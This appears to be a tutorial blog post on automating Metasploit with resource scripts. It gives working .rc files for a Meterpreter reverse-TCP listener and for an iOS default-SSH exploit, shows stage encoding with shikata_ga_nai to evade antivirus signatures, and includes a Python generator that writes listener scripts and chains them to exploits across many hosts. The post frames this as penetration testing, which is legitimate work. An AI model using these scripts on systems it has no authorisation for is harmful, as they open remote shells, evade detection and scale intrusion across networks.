Automated Penetration Testing with Metasploit Framework

The post provides a comprehensive guide to Metasploit Automation, focusing on creating reusable scripts for repeated tasks like setting up listeners and executing exploits


Overview

  • Purpose: Automating repetitive tasks in Metasploit, such as setting up listeners or reusing specific exploits.
  • Why Automate?:
      • Saves time when working on multiple machines or recurring scenarios.
      • Streamlines penetration testing tasks.

Topics Covered

1. Automating Listeners

  1. Creating Listener Scripts:
  • Directory Setup:
mkdir listeners 
cd listeners

Example Script: windows_metasploit_listener.rc

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST <your_IP> 
set LPORT <your_port> 
set ExitOnSession false 
exploit -j -z
  • Save the script with a .rc extension (e.g., windows_listener.rc).

Launching the Script:

  • Command:
sudo msfconsole -r windows_listener.rc
  • Starts msfconsole and runs the listener setup for the configured payload without any manual typing.
  2. Multiple Listeners:
  • Create separate scripts for different payloads (e.g., Android, PHP).
  • Adjust parameters like LHOST, LPORT, and payload type as required.

2. Automating Exploits

  1. Creating Exploit Scripts:
  • Directory Setup:
mkdir exploits 
cd exploits

Example Script: apple_exploit.rc

use exploit/apple/ios/default_ssh 
set RHOSTS 192.168.94.4 
set RPORT 22 
set ExitOnSession false 
exploit -j -z
  • Save the script with a .rc extension (e.g., apple_exploit.rc).

Launching the Script:

  • Command:
sudo msfconsole -r apple_exploit.rc

Executes the exploit script against the target.

3. Key Automation Concepts

  • Encoders and Stage Encoding:
      • Used to make the delivered payload stage harder to match against static signatures. Note that the default encoders are themselves well known to AV engines, so this should not be relied on by itself.
      • Example commands in the listener script:
set EnableStageEncoding true 
set StageEncoder x86/shikata_ga_nai

Exit on Session:

  • Prevents the listener from closing after the first session is established, so it keeps accepting further connections:
set ExitOnSession false
  • Dynamic Port Management:
  • Avoid conflicts by assigning unique ports for each listener or exploit.

Advanced Use Cases

Combining Listeners and Exploits:

  • Automate complete workflows by linking listener scripts with specific exploit scripts.

Scaling for Large Networks:

  • Adjust scripts to target multiple machines by modifying the RHOSTS parameter.
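The listener set, the port-conflict check and the listener-plus-exploit chain described above, as an added example that is not code from the original post. The specs dict, the <name>_listener.rc naming scheme and the LHOST/LPORT values are constructed for illustration; the msfconsole commands emitted (use, set, resource, exploit -j -z) are real.

```python
from pathlib import Path

def render_listener_rc(payload, lhost, lport, stage_encoder=None):
    """Text of a multi/handler listener script (post's windows example)."""
    lines = ["use exploit/multi/handler", f"set payload {payload}",
             f"set LHOST {lhost}", f"set LPORT {lport}"]
    if stage_encoder:  # optional stage encoding, as in the post
        lines += ["set EnableStageEncoding true",
                  f"set StageEncoder {stage_encoder}"]
    # ExitOnSession false keeps the handler up after the first session;
    # -j -z runs it as a background job without dropping into it.
    lines += ["set ExitOnSession false", "exploit -j -z"]
    return "\n".join(lines) + "\n"

def check_unique_ports(specs):
    """Reject a listener set that reuses an LPORT (the port-conflict issue
    from the troubleshooting section); returns the sorted port list."""
    owner = {}
    for name, spec in specs.items():
        port = spec["lport"]
        if port in owner:
            raise ValueError(f"LPORT {port} used by {owner[port]} and {name}")
        owner[port] = name
    return sorted(owner)

def write_listener_scripts(specs, outdir):
    """Write one <name>_listener.rc per spec; returns the paths written."""
    check_unique_ports(specs)
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for name, spec in specs.items():
        path = out / f"{name}_listener.rc"
        path.write_text(render_listener_rc(**spec))
        paths.append(path)
    return paths

def render_chain_rc(listener_rc, exploit_module, rhosts):
    """Link a listener .rc to an exploit via msfconsole's 'resource' command."""
    return "\n".join([f"resource {listener_rc}", f"use {exploit_module}",
                      f"set RHOSTS {rhosts}", "set ExitOnSession false",
                      "exploit -j -z"]) + "\n"

if __name__ == "__main__":  # constructed lab values, not from the post
    specs = {"windows": {"payload": "windows/meterpreter/reverse_tcp",
                         "lhost": "192.168.94.10", "lport": 4444},
             "android": {"payload": "android/meterpreter/reverse_tcp",
                         "lhost": "192.168.94.10", "lport": 4445}}
    for p in write_listener_scripts(specs, "listeners"):
        print(f"msfconsole -r {p}")
```

Each generated file is launched exactly as in the post (msfconsole -r <file>), and the chain script can be run the same way once the listener script it references exists.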

Troubleshooting

Common Issues:

  • Typos in commands (e.g., multi/handler vs. multihandler).
  • Port conflicts: Ensure unique ports for each listener or exploit.
  • Payload mismatches: Verify the payload in scripts matches the target architecture.

Debugging Steps:

  • Check syntax in .rc files.
  • Run Metasploit interactively to validate commands before scripting.

Best Practices

Organize Scripts:

  • Use clear naming conventions (e.g., windows_listener.rc, android_listener.rc).

Test Scripts:

  • Validate each script in a controlled lab environment before using it on a live engagement.

Reuse and Adapt:

  • Create a library of scripts for common scenarios.

Conclusion

Why Automate?: Resource scripts turn repeated listener and exploit setup into a single command, saving time across multiple machines and recurring scenarios.

Next Steps:

  • Experiment with scripting complex workflows.
  • Integrate Metasploit automation into larger pentesting pipelines.

If you have further questions or need clarification on any part of the tutorial, let me know!

Video Walkthrough
